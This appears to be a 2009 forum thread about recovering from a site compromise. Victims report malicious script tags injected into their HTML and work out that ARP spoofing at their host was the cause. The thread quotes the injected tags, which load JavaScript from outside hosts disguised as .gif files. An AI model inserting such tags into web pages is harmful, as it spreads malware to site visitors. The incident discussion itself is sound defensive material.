Recovery steps for hacked Website!

[SEMPro]

Tweet

Hi,

Yesterday, my server get hacked and hackers are inserted javascript badwares. (inserted script is <script language=javascript src=http://telecom.dgnet.net/images/pen.gif></script> )This script was spreading malicious softwares on user system. After few hours Google has detected the same and marked our site as "THIS SITE MAY HARM YOUR COMPUTER" in search result (SERP). My traffic is totally gone after this.

Can you please suggest how I can recover the same ASAP, as our site is a ecommerce website and we are loosing revenue per minute basis. Also on that server so many other websites are hosted. Can we stop Googlebots or other robots and instruct them to come back later. So that search engines bot can't mark our sites as "THIS SITE MAY HARM YOUR COMPUTER".

Thanks for your time for reading and replying appropriate solutions.

Regards,
SEMPro

[Barry]

I had the same just before last chrimbo.

I did the same as you and removed the threat then filed for a re-inclusion request in google webmaster tools. It went in a week and a half.

Sit tight - clean your pants and re-apply to google for a review and maybe check stopbadware.org for anymore information.

Ta

Baz

[Dynamoo]

Of course, you need to fix the underlying problem which I am guessing is a SQL Injection attack or something similar.

You will need to sign up to Google's Webmaster Tools first. That's useful anyway for a big site, then file the reinclusion request from there. Google have a guide here.

But you MUST fix the underlying problem, either by ensuring that all your applications are up to date or by making sure that your SQL inputs are sanitised. That might require you to hire a programmer, unfortunately.

[walkthewalk]

I am suffering the same problem, as of today (2009-02-25). All of my static .html pages have the following at the beginning:
<script language=javascript src=http://telecom.dgnet.net/images/pen.gif></script>
I have a Windows 2003 server.

I'm not having any joy detecting what is causing it. Tried a virus scan and latest version of the Microsoft Windows Malicious Software Removal Tool, but no joy

There are also some entries in the event log from Source "named" with Description along the lines of "client query (cache) './NS/IN' denied". I think this is some kind of DOS attack.

Any help greatly appreciated!

[Dynamoo]

A bit of Googling indicates that these sites are combination of ASP / SQL / Windows. This type of attack is often carried out by the (possibly Russian) Asprox crew, but in this case it looks like a Chinese wannabe gang who copy them.

A bit of Googling around the terms asp asprox sql might yield some useful results, given that you know your back-end architecture. Also, do some Googling for sql injection. Don't forget to look at the ads, as some of those are highly relevant.

Ultimately, the root cause of the problem is that you are allowing SQL to be entered through a URL. The bad guys are probably sending a variety of bad URLs to your system (check your error logs) in order to find one that works.

I cannot stress this easily enough: you need to sanitise your SQL inputs. If you don't fix this, then you will get hit again and again, especially now that the bad guys know that your site is vulnerable.. Google for sanitize sql for some tips.

[walkthewalk]

Thanks for the info. It's weird as none of my sites actually use ASP/SQL Server. They are all static HTML.

Any ideas other than a SQL injection?

I'm trawling through the logs, but nothing thus far.

[Dynamoo]

Thanks for the info. It's weird as none of my sites actually use ASP/SQL Server. They are all static HTML.

Any ideas other than a SQL injection?

I'm trawling through the logs, but nothing thus far.

Well that blows my theory right out of the water! And now I read your post I can see that you were saying static HTML.

I still think that it might be an ASP attack - this is an MS scripting tool used for creating active server pages. You could try disabling ASP (see this howto).

Do you generate HTML directly on the server somehow, or do you upload it from another source? Disabling ASP (plus any other extensions) and re-uploading the HTML might clear it.

Disclaimer: I do work in IT security, but typically endpoint rather than servers.

[bigtrumpet]

Thanks for the info. It's weird as none of my sites actually use ASP/SQL Server. They are all static HTML.

Any ideas other than a SQL injection?

I'm trawling through the logs, but nothing thus far.

I've been the same annoying issue yesterday.
I scanned my Windows 2003 server with 3 antiviruses, without finding any infection.
If you change the HTTP port from 80 to anything, you will see that the malicious code is not added anymore.
I think the problem is related to an ARP poisoning attack.
Question: Do you have any other machines on the same broadcast (layer2) network?
You should ckeck the other machine and you ARP table :-(

[walkthewalk]

Ok problem solved. Basically my hosting provider got hacked. It wasn't actually my server. So I wasted hours looking for something malicious on my box. After lots of emails to support and a couple of calls on, I eventually got this:
--------------------------------------------------------------------------------
The issues with the virus warnings over the websites have been sorted out. It was indeed a network issue & was related to the ARP spoofed attack. One of our dedicated servers used the Gateway IP of the same subnet as your IP's & was using it to inject java script code in our network. We have terminated that infected server as of now & have setup statical ARP on the gateway on each box. We have also raised this issue with our router manufactures for immediate protections against such things happening again in future..

We do sincerely apologise for the entire incident & care has been taken that this doesn't happen again in the future.
--------------------------------------------------------------------------------
This script also got injected into the pages, in addition to what I previously mentioned.
<script language=javascript src=http://www.jalasoft.com/images/ken.gif></script>
The attack was clever enough to only show it on the first browser request too.

If anyone's interested, my host is EUKHOST.

[daveh]

Check your ftp logs as you may probably find that your login details have been compromised and the hacker simply uploaded an edited version of your file. Also check FrontPage access details and search your account for shell scripts.

EDIT: Sorry I missed your last post.